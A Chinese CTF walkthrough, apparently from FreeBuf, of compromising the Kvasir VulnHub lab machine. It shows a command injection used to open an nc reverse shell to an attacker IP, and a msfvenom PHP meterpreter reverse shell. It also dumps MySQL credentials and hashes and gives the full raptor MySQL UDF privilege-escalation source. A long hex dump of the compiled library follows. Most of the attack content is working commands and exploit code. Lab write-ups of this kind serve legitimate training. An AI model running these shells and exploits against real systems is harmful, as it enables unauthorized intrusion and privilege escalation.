官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
Kvasir-CTF靶机实战
- 关注
Kvasir-CTF靶机实战
下载地址
https://download.vulnhub.com/kvasir/kvasir1.tar
实战演练
查找靶机IP
扫描靶机开放端口
这个靶机只开放了80端口,浏览器打开80端口
遇见输入框第一次时间就要看有没有SQL注入
看到上面这个回显,sqlmap跑起,发现403错误
还有一个页面,注册一个账号
发现没有什么东西
现在没有线索可以搞,扫描一下目录,找到login.php,不过测试302跳转了
使用bp显示数据包的response
修改状态码为200
页面显示出来了
修改状态码为200
这个输入框存在命令注入漏洞
nc反弹
apache2; nc -e /bin/sh 192.168.0.106 4444 #
查看页面的源代码
cat login.php
<?php
$username = $_POST["username"];
$password = $_POST["password"];
mysql_connect("192.168.2.200", "webapp", "webapp") or die(mysql_error());
mysql_select_db("webapp") or die(mysql_error());
$query = "SELECT * FROM users where username='$username' AND password='$password'";
$result = mysql_query($query) or die(mysql_error());
if (mysql_num_rows($result) == 1) {
$row = mysql_fetch_array($result);
session_start();
$_SESSION["username"] = $username;
if ($row["admin"] == 1) {
$_SESSION["admin"] = 1;
setcookie(time()+600);
header ("Location: admin.php");
}
elseif ($row["admin"] == 0) {
$_SESSION["member"] = 1;
setcookie(time()+600);
header ("Location: member.php");
}
}
else
header ("Location: index.php?fail=1");
?>
看来有两张网卡
使用数据库进行操作
#查看授权 mysql -uwebapp -pwebapp -h 192.168.2.200 -e 'show grants;' Grants for webapp@192.168.2.100 GRANT SELECT, INSERT ON *.* TO 'webapp'@'192.168.2.100' IDENTIFIED BY PASSWORD '*BF7C27E734F86F28A9386E9759D238AFB863BDE3' GRANT ALL PRIVILEGES ON `webapp`.* TO 'webapp'@'192.168.2.100' #查看数据表 mysql -uwebapp -pwebapp -h 192.168.2.200 -e 'use webapp; show tables;' Tables_in_webapp todo users #查看todo表内容 mysql -uwebapp -pwebapp -h 192.168.2.200 -e 'use webapp; select * from todo;' task stop running mysql as root
一个名为todo存在的表,带有一个字符串stop running mysql as root。那是第一个提示,我立刻想到了MySQL UDF,它可以使我们运行系统命令。但是,为了加载UDF,我需要一个dba级别的帐户,我还没有这个帐户。从先前的Grants输出中,可以看到我可以查询数据库服务器上的任何表,因此让我们获取一些管理哈希:
mysql -uwebapp -pwebapp -h 192.168.2.200 -e 'use mysql; select DISTINCT User,Password from user;' User Password root *ECB01D78C2FBEE997EDA584C647183FD99C115FD debian-sys-maint *E0E0871376896664A590151D348CCE9AA800435B webapp *BF7C27E734F86F28A9386E9759D238AFB863BDE3
接下来破解一下mysql密码,coolwater
来到这一步,发现这个命令执行漏洞的nc反弹好麻烦,于是我使用kali自带的反弹shell
root@kali:/tmp# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.106 LPORT=4444 -f raw > shell.php [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 30656 bytes
使用nc传送shell.php
root@kali:/tmp# cat shell.php | nc -lvp 12345 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::12345 Ncat: Listening on 0.0.0.0:12345 Ncat: Connection from 192.168.0.104. Ncat: Connection from 192.168.0.104:57056.
使用msf进行反弹连接
设置端口转发,本地连接数据库
meterpreter > portfwd add -l 3306 -p 3306 -r 192.168.2.200 [*] Local TCP relay created: :3306 <-> 192.168.2.200:3306
现在就可以连接上数据库了
查看文件
看来权限不够
如果您有一个mysql以root用户身份运行的目标,并且对目标mysql实例具有足够的特权,则可以通过编译和加载恶意库来提升命令执行的效率。
exp
#include <stdio.h>
#include <stdlib.h>
enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};
typedef struct st_udf_args {
unsigned int arg_count; // number of arguments
enum Item_result *arg_type; // pointer to item_result
char **args; // pointer to arguments
unsigned long *lengths; // length of string args
char *maybe_null; // 1 for maybe_null args
} UDF_ARGS;
typedef struct st_udf_init {
char maybe_null; // 1 if func can return NULL
unsigned int decimals; // for real functions
unsigned long max_length; // for string functions
char *ptr; // free ptr for func data
char const_item; // 0 if result is constant
} UDF_INIT;
int do_cmd(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
if (args->arg_count != 1)
return(0);
system(args->args[0]);
return(0);
}
char do_cmd_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
return(0);
}
接下来,我们来编译库
root@kali:/tmp# vim raptor.c root@kali:/tmp# gcc -fPIC -g -c raptor.c root@kali:/tmp# gcc -g -shared -Wl,-soname,raptor.so -o raptor.so raptor.o -lc
用以下命令将文件的内容编码为十六进制
root@kali:/tmp# xxd -p -c `stat --format="%s" raptor.so` raptor.so 7f454c4602010100000000000000000003003e000100000050100000000000004000000000000000584200000000000000000000400038000900400020001f000100000004000000000000000000000000000000000000000000000000000000c804000000000000c804000000000000001000000000000001000000050000000010000000000000001000000000000000100000000000006901000000000000690100000000000000100000000000000100000004000000002000000000000000200000000000000020000000000000cc00000000000000cc0000000000000000100000000000000100000006000000002e000000000000003e000000000000003e0000000000002802000000000000300200000000000000100000000000000200000006000000102e000000000000103e000000000000103e000000000000d001000000000000d0010000000000000800000000000000040000000400000038020000000000003802000000000000380200000000000024000000000000002400000000000000040000000000000050e57464040000000020000000000000002000000000000000200000000000002c000000000000002c00000000000000040000000000000051e574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000052e5746404000000002e000000000000003e000000000000003e000000000000000200000000000000020000000000000100000000000000040000001400000003000000474e55005e9d8663bf7886522a23711229527f095019b37a0000000002000000060000000100000006000000000000400008005006000000070000009f0f9b122b4f31f90000000000000000000000000000000000000000000000001000000020000000000000000000000000000000000000005c00000012000000000000000000000000000000000000000100000020000000000000000000000000000000000000002c00000020000000000000000000000000000000000000004600000022000000000000000000000000000000000000006300000012000c00491100000000000017000000000000005500000012000c0005110000000000004400000000000000005f5f676d6f6e5f73746172745f5f005f49544d5f64657265676973746572544d436c6f6e655461626c65005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a6500646f5f636d640073797374656d00646f5f636d645f696e6974006c6962632e736f2e3600726170746f722e736f00474c4942435f322e322e35000000000000020000000000020001000100010001006f0000001000000000000000751a6909000002008300000000000000003e00000000000008000000000000000011000000000000083e0000000000000800000000000000c010000000000000204000000000000008000000000000002040000000000000e03f00000000000006000000010000000000000000000000e83f00000000000006000000030000000000000000000000f03f00000000000006000000040000000000000000000000f83f00000000000006000000050000000000000000000000184000000000000007000000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004883ec08488b05dd2f00004885c07402ffd04883c408c3000000000000000000ff35e22f0000ff25e42f00000f1f4000ff25e22f00006800000000e9e0ffffffff25b22f000066900000000000000000488d3dd12f0000488d05ca2f00004839f87415488b05762f00004885c07409ffe00f1f8000000000c30f1f8000000000488d3da12f0000488d359a2f00004829fe48c1fe034889f048c1e83f4801c648d1fe7414488b05452f00004885c07408ffe0660f1f440000c30f1f8000000000803d612f000000752f5548833d262f0000004889e5740c488b3d422f0000e85dffffffe868ffffffc605392f0000015dc30f1f8000000000c30f1f8000000000e97bffffff554889e54883ec2048897df8488975f0488955e848894de0488b45f08b0083f8017407b800000000eb18488b45f0488b4010488b004889c7e8eefeffffb800000000c9c3554889e548897df8488975f0488955e8b8000000005dc34883ec084883c408c3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011b033b2c0000000400000020f0ffff4800000040f0ffff7000000005f1ffff8800000049f1ffffa8000000000000001400000000000000017a5200017810011b0c070890010000240000001c000000d0efffff20000000000e10460e184a0f0b770880003f1a3b2a332422000000001400000044000000c8efffff0800000000000000000000001c0000005c00000075f0ffff4400000000410e108602430d067f0c07080000001c0000007c00000099f0ffff1700000000410e108602430d06520c07080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000c01000000000000001000000000000006f000000000000000e0000000000000079000000000000000c0000000000000000100000000000000d0000000000000060110000000000001900000000000000003e0000000000001b0000000000000008000000000000001a00000000000000083e0000000000001c000000000000000800000000000000f5feff6f00000000600200000000000005000000000000004803000000000000060000000000000088020000000000000a000000000000008f000000000000000b0000000000000018000000000000000300000000000000004000000000000002000000000000001800000000000000140000000000000007000000000000001700000000000000b004000000000000070000000000000008040000000000000800000000000000a80000000000000009000000000000001800000000000000feffff6f00000000e803000000000000ffffff6f000000000100000000000000f0ffff6f00000000d803000000000000f9ffff6f00000000030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000103e00000000000000000000000000000000000000000000361000000000000020400000000000004743433a202844656269616e20382e332e302d362920382e332e30002c00000002000000000008000000000005110000000000005b0000000000000000000000000000000000000000000000970400000400000000000801450100000c6a020000bd02000005110000000000005b0000000000000000000000022500000002d8173900000003080751000000030407560000000408030108ed01000003020705010000030106ef010000030205fb010000050405696e74000308057100000002090000000396196c000000026002000003971b6c000000060891000000030106f6010000079100000008b3010000d8043108240200000999000000043307650000000009110000000436098b00000008098c0000000437098b0000001009730200000438098b0000001809f30200000439098b0000002009ee000000043a098b000000280992010000043b098b00000030093f000000043c098b0000003809a0000000043d098b0000004009230100000440098b0000004809c20200000441098b0000005009810200000442098b0000005809e40100000444163d02000060091e0000000446144302000068098400000004480765000000700937010000044907650000007409c4000000044a0b730000007809ac000000044d125000000080092c020000044e0f5700000082092c000000044f084902000083093101000004510f590200008809c800000004590d7f0000009009bb000000045b1764020000980908020000045c196f020000a009d2020000045d1443020000a809e1000000045e0947000000b0099a020000045f0a2d000000b8093f01000004600765000000c009a102000004620875020000c40002b70100000507199d0000000aa8010000042b0e0bd000000006083802000006089d0000000c91000000590200000d3900000000000608300200000bb800000006085f0200000b0502000006086a0200000c91000000850200000d3900000013000edb00000006890e910200000608240200000e79010000068a0e910200000eaa020000068b0e910200000efc000000071a0c650000000cd1020000c60200000f0007bb02000006089800000007cb0200000ed1010000071b1ac60200000308056c0000000308074c00000010020300000704400000000104061b03000011130200000011b102000001118001000002115502000003000841020000280106106a030000097a00000001070e400000000009360000000108136a030000080948020000010908700300001009e0020000010a1076030000180918010000010b078b00000020000608f002000006088b0000000608390000000200000000010c031b030000088e02000020010e10d70300000918010000010f06910000000009bc01000001100e400000000409e802000001110f390000000812707472000112078b00000010092102000001130691000000180002630000000114038803000013c50100000120069100000049110000000000001700000000000000019c33040000148b01000001201c33040000029168144802000001202e3904000002916014a001000001203a8b000000029158000608d703000006087c03000015dd0100000116056500000005110000000000004400000000000000019c148b01000001161633040000029168144802000001162839040000029160144d0200000116348b000000029158143b0200000116438b0000000291500000011101250e130b030e1b0e1101120710170000021600030e3a0b3b0b390b491300000324000b0b3e0b030e0000040f000b0b00000524000b0b3e0b03080000060f000b0b4913000007260049130000081301030e0b0b3a0b3b0b390b01130000090d00030e3a0b3b0b390b4913380b00000a1600030e3a0b3b0b390b00000b1300030e3c1900000c01014913011300000d210049132f0b00000e3400030e3a0b3b0b390b49133f193c1900000f21000000100401030e3e0b0b0b49133a0b3b0b390b01130000112800030e1c0b0000120d0003083a0b3b0b390b4913380b0000132e013f19030e3a0b3b0b390b2719491311011207401897421901130000140500030e3a0b3b0b390b491302180000152e013f19030e3a0b3b0b390b27194913110112074018964219000000260100000200ee0000000101fb0e0d0001010101000000010000012f7573722f6c69622f6763632f7838365f36342d6c696e75782d676e752f382f696e636c756465002f7573722f696e636c7564652f7838365f36342d6c696e75782d676e752f62697473002f7573722f696e636c7564652f7838365f36342d6c696e75782d676e752f626974732f7479706573002f7573722f696e636c7564650000726170746f722e63000000007374646465662e680001000074797065732e68000200007374727563745f46494c452e680003000046494c452e6800030000737464696f2e68000400007379735f6572726c6973742e6800020000000501000902051100000000000003160105090875050466050759050c760501820507ae050159310507f305015902020001015544465f41524753005f5f6f66665f74005f494f5f726561645f707472005f636861696e0073697a655f74005f73686f7274627566006172675f74797065005f494f5f6275665f62617365006c6f6e67206c6f6e6720756e7369676e656420696e74005544465f494e4954006c6f6e67206c6f6e6720696e74006172675f636f756e74005f66696c656e6f005f494f5f726561645f656e64005f666c616773005f494f5f6275665f656e64005f6375725f636f6c756d6e005f494f5f636f6465637674005f6f6c645f6f6666736574005f494f5f6d61726b657200737464696e005f667265657265735f627566005f494f5f77726974655f707472007379735f6e6572720073686f727420756e7369676e656420696e74006d617962655f6e756c6c005f494f5f736176655f62617365005f6c6f636b005f666c61677332005f6d6f646500474e552043313720382e332e30202d6d74756e653d67656e65726963202d6d617263683d7838362d3634202d67202d66504943007374646f757400494e545f524553554c5400696e69746964005f494f5f77726974655f656e64006d657373616765005f494f5f6c6f636b5f74005f494f5f46494c4500646563696d616c7300646f5f636d645f696e6974007379735f6572726c69737400646f5f636d64005f6d61726b65727300756e7369676e656420636861720073686f727420696e74005f494f5f776964655f6461746100535452494e475f524553554c5400636f6e73745f6974656d005f767461626c655f6f6666736574006572726f720073745f7564665f617267730069735f6e756c6c00524f575f524553554c54005f5f6f666636345f7400726170746f722e63005f494f5f726561645f62617365005f494f5f736176655f656e640073745f7564665f696e6974005f5f70616435005f756e757365643200737464657272005245414c5f524553554c54002f746d70005f494f5f6261636b75705f62617365005f667265657265735f6c697374006c656e67746873006d61785f6c656e677468005f494f5f77726974655f62617365004974656d5f726573756c740000000000000000000000000000000000000000000000000000000000000000000003000100380200000000000000000000000000000000000003000200600200000000000000000000000000000000000003000300880200000000000000000000000000000000000003000400480300000000000000000000000000000000000003000500d80300000000000000000000000000000000000003000600e80300000000000000000000000000000000000003000700080400000000000000000000000000000000000003000800b00400000000000000000000000000000000000003000900001000000000000000000000000000000000000003000a00201000000000000000000000000000000000000003000b00401000000000000000000000000000000000000003000c00501000000000000000000000000000000000000003000d00601100000000000000000000000000000000000003000e00002000000000000000000000000000000000000003000f00302000000000000000000000000000000000000003001000003e00000000000000000000000000000000000003001100083e00000000000000000000000000000000000003001200103e00000000000000000000000000000000000003001300e03f00000000000000000000000000000000000003001400004000000000000000000000000000000000000003001500204000000000000000000000000000000000000003001600284000000000000000000000000000000000000003001700000000000000000000000000000000000000000003001800000000000000000000000000000000000000000003001900000000000000000000000000000000000000000003001a00000000000000000000000000000000000000000003001b00000000000000000000000000000000000000000003001c0000000000000000000000000000000000010000000400f1ff000000000000000000000000000000000c00000002000c00501000000000000000000000000000000e00000002000c00801000000000000000000000000000002100000002000c00c01000000000000000000000000000003700000001001600284000000000000001000000000000004600000001001100083e00000000000000000000000000006d00000002000c00001100000000000000000000000000007900000001001000003e0000000000000000000000000000980000000400f1ff00000000000000000000000000000000010000000400f1ff00000000000000000000000000000000a100000001000f00c8200000000000000000000000000000000000000400f1ff00000000000000000000000000000000af00000002000d0060110000000000000000000000000000***000000100150020400000000000000000000000000000c200000001001200103e0000000000000000000000000000cb00000000000e0000200000000000000000000000000000de0000000100150028400000000000000000000000000000ea00000001001400004000000000000000000000000000003601000002000900001000000000000000000000000000000001000020000000000000000000000000000000000000001c01000012000000000000000000000000000000000000003001000012000c00491100000000000017000000000000003c01000020000000000000000000000000000000000000004b01000012000c00051100000000000044000000000000005201000020000000000000000000000000000000000000006c01000022000000000000000000000000000000000000000063727473747566662e6300646572656769737465725f746d5f636c6f6e6573005f5f646f5f676c6f62616c5f64746f72735f61757800636f6d706c657465642e37333235005f5f646f5f676c6f62616c5f64746f72735f6175785f66696e695f61727261795f656e747279006672616d655f64756d6d79005f5f6672616d655f64756d6d795f696e69745f61727261795f656e74727900726170746f722e63005f5f4652414d455f454e445f5f005f66696e69005f5f64736f5f68616e646c65005f44594e414d4943005f5f474e555f45485f4652414d455f484452005f5f544d435f454e445f5f005f474c4f42414c5f4f46465345545f5441424c455f005f49544d5f64657265676973746572544d436c6f6e655461626c650073797374656d4040474c4942435f322e322e3500646f5f636d645f696e6974005f5f676d6f6e5f73746172745f5f00646f5f636d64005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a654040474c4942435f322e322e3500002e73796d746162002e737472746162002e7368737472746162002e6e6f74652e676e752e6275696c642d6964002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e706c742e676f74002e74657874002e66696e69002e65685f6672616d655f686472002e65685f6672616d65002e696e69745f6172726179002e66696e695f6172726179002e64796e616d6963002e676f742e706c74002e64617461002e627373002e636f6d6d656e74002e64656275675f6172616e676573002e64656275675f696e666f002e64656275675f616262726576002e64656275675f6c696e65002e64656275675f73747200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000